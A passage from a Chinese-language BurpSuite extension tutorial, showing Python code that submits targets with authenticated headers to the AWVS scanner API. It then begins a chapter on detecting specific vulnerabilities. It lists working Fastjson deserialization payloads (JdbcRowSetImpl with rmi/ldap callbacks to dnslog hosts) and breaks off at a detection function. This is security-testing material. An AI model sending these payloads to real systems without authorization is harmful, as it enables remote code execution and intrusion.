def startscan(self,tarUrl,reqHeaders):
# 先获取全部的任务.避免重复
# 添加任务获取target_id
# 开始扫描
target_id = self.updateConfig(tarUrl,reqHeaders)
if target_id:
data = {"target_id": target_id, "profile_id": "11111111-1111-1111-1111-111111111112",
"schedule": {"disable": False, "start_date": None, "time_sensitive": False}}
try:
response = requests.post(self.awvsurl + "api/v1/scans", data=json.dumps(data), headers=self.awvsheaders, timeout=30,
verify=False)
except Exception as e:
print(str(e))
pass
return
4、展示效果
这里配置你的awvs url和apikey
这样的话,每个url都有两个扫描,一个主动扫描,一个做爬虫,把所有的流量导入xray
包含完整的用户身份信息的header头都在里面,可以实现登录后自动化扫描
5、代码地址
https://github.com/dongfangyuxiao/BurpExtend/blob/master/AWVS/burp_awvs.py
第六章:BurpSuit之应急响应或特定漏洞扫描案例
目的:
用于在突发0day的时候或想要扫描特定的漏洞的时候,可以编写burp插件用于特定漏洞的探测发现
例如,我们想要检测fastjson漏洞,首先定义一个fastjson的payload列表
self.fastjson = [
'{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://fastjson1.m4mta5.ceye.io","autoCommit":true}}',
'{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://fastjson2.m4mta5.ceye.io/Object","autoCommit":true}',
'{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://fastjson3.m4mta5.ceye.io","autoCommit":true}}}',
'{"b":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://fastjson1.dongfangyuxiao.l.dnslog.io","autoCommit":true}}',
'{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"rmi://fastjson2.dongfangyuxiao.l.dnslog.io/Object","autoCommit":true}',
'{"name":{"@type":"java.lang.Class","val":"com.sun.rowset.JdbcRowSetImpl"},"x":{"@type":"com.sun.rowset.JdbcRowSetImpl","dataSourceName":"ldap://fastjson3.dongfangyuxiao.l.dnslog.io","autoCommit":true}}}'
]
我们写一个fastjson的漏洞检测类
def fastjson(self, url, heaers, host):